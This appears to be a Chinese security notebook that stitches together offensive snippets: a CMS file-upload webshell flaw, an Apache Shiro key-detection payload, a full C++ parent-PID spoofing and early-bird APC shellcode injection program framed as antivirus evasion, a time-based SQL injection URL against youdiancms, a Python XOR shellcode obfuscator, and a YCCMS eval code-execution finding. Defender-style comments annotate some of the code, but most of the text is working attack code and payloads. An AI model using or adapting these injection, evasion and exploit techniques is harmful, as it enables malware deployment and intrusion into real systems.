
MSBuild

Microsoft Build Engine是一个用于生成应用程序的平台。 此引擎(也称为 MSBuild)为项目文件提供了一个 XML 架构,用于控制生成平台处理和生成软件的方式。


文件上传漏洞

\App\Lib\Action\AdminBaseAction.class.php

漏洞成因,因为可上传zip文件,并且会将其解压,解压时有限制模板内不能包含php、jsp、aspx等文件,但又排除了common_en.php和common_cn.php文件,所以可以将这两个文件内容更改为webshell上传。(需后台权限)


Shiro-POC检测

使用key加密序列化后的二进制数据,当key正确时,响应包不会返回deleteMe。

b'\xac\xed\x00\x05sr\x002org.apache.shiro.subject.SimplePrincipalCollection\xa8\x7fX%\xc6\xa3\x08J\x03\x00\x01L\x00\x0frealmPrincipalst\x00\x0fLjava/util/Map;xppw\x01\x00x'

test

test2

免杀-PPID Spoofing

#include <windows.h>
#include <TlHelp32.h>
#include <iostream>

// Walks a Toolhelp process snapshot and returns the PID of the first entry
// whose image name is "explorer.exe". main() uses this PID as the spoofed
// parent of the process it creates.
//
// Defender note: the snapshot handle is not checked against
// INVALID_HANDLE_VALUE, and the loop exits only on a match, so when no
// explorer.exe is running the value returned is whatever th32ProcessID the
// last enumerated entry (or the zero-initialised struct) left behind.
// Parent-PID spoofing makes the child appear under explorer.exe in
// user-mode process-tree views; kernel process-creation callbacks still see
// the real creating thread, which is typically how this is detected.
DWORD getParentProcessID() {
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 process = { 0 };
    process.dwSize = sizeof(process);  // required by Process32First

    if (Process32First(snapshot, &process)) {
        do {
            //If you want to another process as parent change here
            if (!wcscmp(process.szExeFile, L"explorer.exe"))
                break;  // process now holds the matching entry
        } while (Process32Next(snapshot, &process));
    }

    CloseHandle(snapshot);
    return process.th32ProcessID;
}

// Starts iexplore.exe suspended with explorer.exe registered as its parent
// (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS), writes shellCode into the new
// process, queues it as an APC on the suspended main thread and resumes it
// (the pattern commonly called "early bird" APC injection).
//
// Defender note: every step here is individually observable telemetry —
// OpenProcess(PROCESS_ALL_ACCESS) on explorer.exe, CreateProcess with
// EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED, a PAGE_EXECUTE_READWRITE
// VirtualAllocEx in a freshly created process, WriteProcessMemory into it,
// QueueUserAPC onto its primary thread, then ResumeThread. None of the API
// return values are checked, and expHandle / pInfo.hProcess are never closed.
int main() {

    // Payload buffer; empty in this listing, so sizeof(shellCode) == 1.
    unsigned char shellCode[] = "";

    STARTUPINFOEXA sInfoEX;
    PROCESS_INFORMATION pInfo;
    SIZE_T sizeT;

    // Handle to the process that will be reported as the parent.
    HANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, getParentProcessID());

    ZeroMemory(&sInfoEX, sizeof(STARTUPINFOEXA));
    // First call with a NULL list only yields the required size in sizeT;
    // the second call initialises the allocated list.
    InitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);
    sInfoEX.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);
    InitializeProcThreadAttributeList(sInfoEX.lpAttributeList, 1, 0, &sizeT);
    // This attribute is what makes the child appear under explorer.exe.
    UpdateProcThreadAttribute(sInfoEX.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);
    sInfoEX.StartupInfo.cb = sizeof(STARTUPINFOEXA);

    // Child is created suspended and windowless; the extended startup info
    // carries the parent attribute set above.
    CreateProcessA("C:\\Program Files\\internet explorer\\iexplore.exe", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, reinterpret_cast<LPSTARTUPINFOA>(&sInfoEX), &pInfo);

    // RWX allocation in the remote process — a high-signal event for memory
    // scanners and EDR hooks.
    LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pInfo.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    SIZE_T *lpNumberOfBytesWritten = 0;  // NULL: bytes-written count is discarded
    BOOL resWPM = WriteProcessMemory(pInfo.hProcess, lpBaseAddress, (LPVOID)shellCode, sizeof(shellCode), lpNumberOfBytesWritten);

    // The APC fires when the suspended primary thread is resumed below.
    QueueUserAPC((PAPCFUNC)lpBaseAddress, pInfo.hThread, NULL);
    ResumeThread(pInfo.hThread);
    CloseHandle(pInfo.hThread);

    return 0;
}

效果


PHP代码审计入门-youdiancms9.1

sql注入

App/Lib/Action/Admin/AreaAction.class.php

与之前旧版本8.0相同位置仍存在sql注入

function index(){
header("Content-Type:text/html; charset=utf-8");
$AreaID = empty($_REQUEST['id']) ? 0 : $_REQUEST['id'];
$Parent = $AreaID; //当前区域的父级
$Grand = 0; //当前区域的爷爷
$m = D("Admin/Area");
$data = $m->getArea($AreaID);
if(!empty($data)){
$n = count($data);
for($i=0; $i<$n; $i++){
$data[$i]['ChildCount'] = $m->getChildCount( $data[$i]['AreaID'] );
}
}

if($Parent>0){
$Grand = $m->where("AreaID={$Parent}")->getField('Parent');
}

复现:

http://127.0.0.1/index.php/Admin/area/index/id/2%20AND%20(SELECT%209380%20FROM%20(SELECT(SLEEP(10)))DAOl)

sqlmap

xor混淆shellcode

# Reads shellcode.raw, XORs it with a short repeating key and prints both the
# encoded bytes and the key as "\x.." strings. `ranstr` is not defined in this
# excerpt; presumably it returns a 3-character random string — confirm.
#
# Defender note: repeating-key XOR with a 3-byte key is obfuscation, not
# encryption — the key is recoverable from the ciphertext alone and is printed
# next to the output anyway. It only changes the static byte pattern; the
# decode loop and key have to be present in the loader at runtime.
with open('shellcode.raw','rb') as shellcodeFileHandle:
    shellcodeBytes = bytearray(shellcodeFileHandle.read())
Key = ranstr(3)
keyAsInt = list(map(ord,Key))  # key characters as ints for the XOR
Length = len(Key)
# Key byte for position i is keyAsInt[i % Length] (repeating key).
data = bytes(bytearray(((shellcodeBytes[i] ^ keyAsInt[i % Length]) for i in range(0,len(shellcodeBytes)) )))
# Render as a C-style "\x.." escape string.
shellcode = "\\x"
shellcode += "\\x".join(format(b,'02x') for b in data)
print("\nXOR_Shellcode:\n" + shellcode)
print("\nXOR_Key:\n" + Key)

PHP代码审计入门-YCCMS3.3

代码执行

public\class\Factory.class.php

eval()中有$_a传入参数
file_exists() 函数检查文件或目录是否存在。如果为真则返回 true
这里可以看到当路径检测为true时取反,继续将参数传入eval执行
